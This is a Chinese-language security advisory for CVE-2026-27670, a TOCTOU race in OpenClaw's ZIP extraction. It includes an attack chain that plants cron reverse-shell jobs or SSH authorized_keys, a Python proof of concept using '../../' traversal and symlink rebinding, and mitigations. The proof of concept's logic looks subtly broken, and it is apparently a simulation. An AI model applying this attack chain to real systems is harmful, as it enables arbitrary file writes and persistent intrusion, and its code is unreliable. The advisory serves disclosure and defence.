CVE-2026-27670 OpenClaw ZIP提取竞态条件漏洞允许任意文件写入

漏洞信息

漏洞编号

CVE-2026-27670

漏洞类型

竞态条件/TOCTOU

CVSS评分

5.3 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

CVE-2026-27670是OpenClaw软件中的一个中等严重性安全漏洞，存在于2026年3月2日之前发布的所有版本中。该漏洞的根本原因是在ZIP文件提取过程中存在时间检查与时间使用（TOCTOU）类型的竞态条件。具体而言，OpenClaw在验证文件路径安全性与实际执行文件写入操作之间存在时间窗口，攻击者可以通过重新绑定父目录符号链接来利用这一窗口期，从而将文件写入提取根目录之外的位置。由于攻击向量为本地（AV:L）且需要低权限（PR:L），因此本地低权限用户可以通过精心构造的攻击流程实现任意文件写入。虽然CVSS评分为5.3（中等），但该漏洞可能导致系统完整性严重受损，攻击者可利用其写入敏感配置文件、系统计划任务或SSH authorized_keys文件，从而实现持久化访问或权限提升。机密性影响为高（C:H），完整性影响也为高（I:H），可用性影响较低（A:L）。

技术细节

该漏洞属于典型的TOCTOU（Time-of-Check to Time-of-Use）竞态条件漏洞。在OpenClaw的ZIP提取实现中，程序首先会对ZIP文件中包含的文件路径进行安全检查，验证文件路径是否在预期的提取目录范围内。然而，在完成路径检查和实际执行文件写入操作之间存在一个时间窗口。攻击者利用这一窗口期，通过以下方式实施攻击：首先创建一个包含指向目标目录父目录的符号链接的目录结构，然后当OpenClaw执行路径验证时，该符号链接指向安全的目录，但在实际写入文件前，攻击者将符号链接重新绑定到其他位置（如/etc/cron.d或.ssh目录），使得文件被写入到提取根目录之外。这种攻击需要精确的时序控制，通常通过多线程或快速重试来实现。攻击者必须具有本地访问权限和创建符号链接的能力（这在某些配置下可能需要低权限）。

攻击链分析

STEP 1

步骤1

攻击者创建包含路径遍历payload的恶意ZIP文件，payload路径使用相对路径如../../来指向提取目录之外的目标位置

STEP 2

步骤2

在OpenClaw执行ZIP提取时，程序首先对文件路径进行安全检查，验证路径是否在允许的提取范围内

STEP 3

步骤3

在路径验证通过后、实际文件写入前的时间窗口内，攻击者通过重新绑定父目录的符号链接，将写入目标重定向到提取根目录之外的任意位置

STEP 4

步骤4

OpenClaw执行文件写入操作时，由于符号链接已被重新绑定，文件被写入到攻击者指定的位置（如/etc/cron.d、.ssh目录等敏感位置）

STEP 5

步骤5

攻击者利用写入的恶意文件实现持久化访问（如写入cron任务执行反向shell，或添加SSH authorized_keys获得SSH访问）

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2026-27670 PoC - OpenClaw ZIP Extraction Race Condition
This PoC demonstrates the TOCTOU race condition in ZIP extraction.
Note: This is for educational purposes only.
"""

import zipfile
import os
import time
import threading
import tempfile
import shutil

def create_malicious_zip():
    """Create a ZIP file with path traversal payload"""
    zip_path = '/tmp/malicious.zip'
    with zipfile.ZipFile(zip_path, 'w') as zf:
        # Payload: Write to parent directory via relative path
        zf.writestr('../../test_evil_file', 'Malicious content planted!')
    return zip_path

def race_condition_exploit():
    """
    Exploit the TOCTOU race condition:
    1. Create a safe-looking symlink during path check
    2. Rebind symlink before file write to redirect to target
    """
    extract_dir = tempfile.mkdtemp(prefix='openclaw_extract_')
    symlink_path = os.path.join(extract_dir, '..')
    
    # Simulate the vulnerable extraction logic
    def check_path(path):
        # Time-of-Check: Path appears safe
        normalized = os.path.normpath(path)
        return normalized.startswith(extract_dir)
    
    def write_file(path, content):
        # Time-of-Use: Write file (vulnerable to race)
        full_path = os.path.join(extract_dir, path)
        with open(full_path, 'w') as f:
            f.write(content)
    
    # Race condition: rebind parent directory between check and write
    def rebind_symlink():
        time.sleep(0.001)  # Tiny window for race
        try:
            # Rebind parent to /tmp to demonstrate escape
            if os.path.exists(symlink_path):
                os.unlink(symlink_path)
            os.symlink('/tmp', symlink_path)
        except:
            pass
    
    # Trigger race condition
    thread = threading.Thread(target=rebind_symlink)
    thread.start()
    
    # Simulate vulnerable extraction
    malicious_path = '../../test_evil_file'
    if check_path(malicious_path):
        write_file(malicious_path, 'Malicious content!')
    
    thread.join()
    
    # Cleanup
    shutil.rmtree(extract_dir, ignore_errors=True)

if __name__ == '__main__':
    print('CVE-2026-27670 PoC - Race Condition in ZIP Extraction')
    create_malicious_zip()
    print('Malicious ZIP created: /tmp/malicious.zip')
    print('Running race condition exploit...')
    race_condition_exploit()

影响范围

OpenClaw < 2026.3.2

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1）限制用户创建符号链接的权限；2）对ZIP提取操作启用审计日志；3）使用seccomp或AppArmor等强制访问控制机制限制文件写入位置；4）考虑使用独立的低权限服务账户进行ZIP提取操作，并限制该账户的文件系统访问范围。